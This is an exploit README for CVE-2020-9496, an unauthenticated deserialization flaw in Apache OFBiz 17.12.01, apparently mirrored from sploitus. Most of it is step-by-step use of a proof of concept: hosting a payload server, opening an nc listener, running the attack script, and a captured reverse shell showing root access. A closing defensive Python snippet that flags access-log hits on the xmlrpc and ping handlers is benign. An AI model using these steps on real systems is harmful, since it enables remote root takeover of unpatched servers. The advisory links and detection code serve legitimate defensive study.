## https://sploitus.com/exploit?id=ABCA413C-500D-5BEA-A61C-33ADF43BB2FF
# CVE-2020-9496
Because the two XML-RPC related request handlers in webtools (xmlrpc and ping) do not require authentication, they are vulnerable to unsafe deserialization.
This issue was reported to the security team by Alvaro Munoz from the GitHub Security Lab team.
# Affected Version: 17.12.01
# Fixed Versions: 18.12.01, 17.12.04
Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Apache's Post: https://issues.apache.org/jira/browse/OFBIZ-11716
Github's POC: https://github.com/g33xter/CVE-2020-9496
In order to make this exploit work, follow these steps:
### Step 1: Host HTTP Service with python3
```
> sudo python3 -m http.server 80
```
### Step 2: Run an nc listener on the desired port (8001 recommended)
```
> nc -nlvp 8001
```
### Step 3: Change the website's URL and port inside the script:
```
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
```
### Step 4: Run the exploit as shown below
```
> ./cve-2020-9496.sh -i IP -p PORT
```
### Step 5: Check nc listener
```
❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01#
```
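As an added defender-side example (not code from the PoC repository or from Apache OFBiz), the following Python flags access-log entries that reached the two unauthenticated handlers named above and checks an OFBiz version string against the fixed releases listed on this page. The `/webtools/control/` path prefix, the access-log format and the sample log lines are assumptions constructed for the example.

```python
import re
from typing import List, Optional, Tuple

# The two unauthenticated webtools handlers named in the advisory.
# Assumption: the default OFBiz controller mount (/webtools/control/).
SUSPECT_PATHS = ("/webtools/control/xmlrpc", "/webtools/control/ping")

# Fixed releases named on the page, keyed by release branch.
FIXED_BY_BRANCH = {(17, 12): (17, 12, 4), (18, 12): (18, 12, 1)}

# Tomcat-style "combined" access log prefix (assumed log format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_version(v: str) -> Tuple[int, ...]:
    """'17.12.01' -> (17, 12, 1)."""
    return tuple(int(p) for p in v.strip().split("."))


def is_vulnerable(version: str) -> Optional[bool]:
    """True if below the fixed release of its branch; None for branches the
    page does not list. Assumption: every release before the fix is affected."""
    parts = parse_version(version)
    fixed = FIXED_BY_BRANCH.get(parts[:2])
    return None if fixed is None else parts < fixed


def find_hits(lines: List[str]) -> List[dict]:
    """Return access-log entries that hit the xmlrpc or ping handlers.
    The query string is stripped so '/ping?x=1' still matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; route elsewhere in practice
        path = m.group("path").split("?", 1)[0]
        if path in SUSPECT_PATHS:
            hits.append({"src": m.group("src"), "method": m.group("method"),
                         "path": path, "status": int(m.group("status"))})
    return hits


# Constructed sample log lines, not taken from any real system.
SAMPLE_LOG = [
    '10.10.1.5 - - [01/Jul/2020:12:00:00 +0000] "GET /webtools/control/main HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.10.1.9 - - [01/Jul/2020:12:00:03 +0000] "POST /webtools/control/xmlrpc HTTP/1.1" 200 512 "-" "python-requests/2.23"',
    '10.10.1.9 - - [01/Jul/2020:12:00:04 +0000] "POST /webtools/control/ping?x=1 HTTP/1.1" 500 0 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for h in find_hits(SAMPLE_LOG):
        print(f"{h['src']} {h['method']} {h['path']} -> {h['status']}")
    print("17.12.01 vulnerable:", is_vulnerable("17.12.01"))
```

Legitimate XML-RPC integrations will also show up in `find_hits`, so allow-list their source addresses before alerting on the rest.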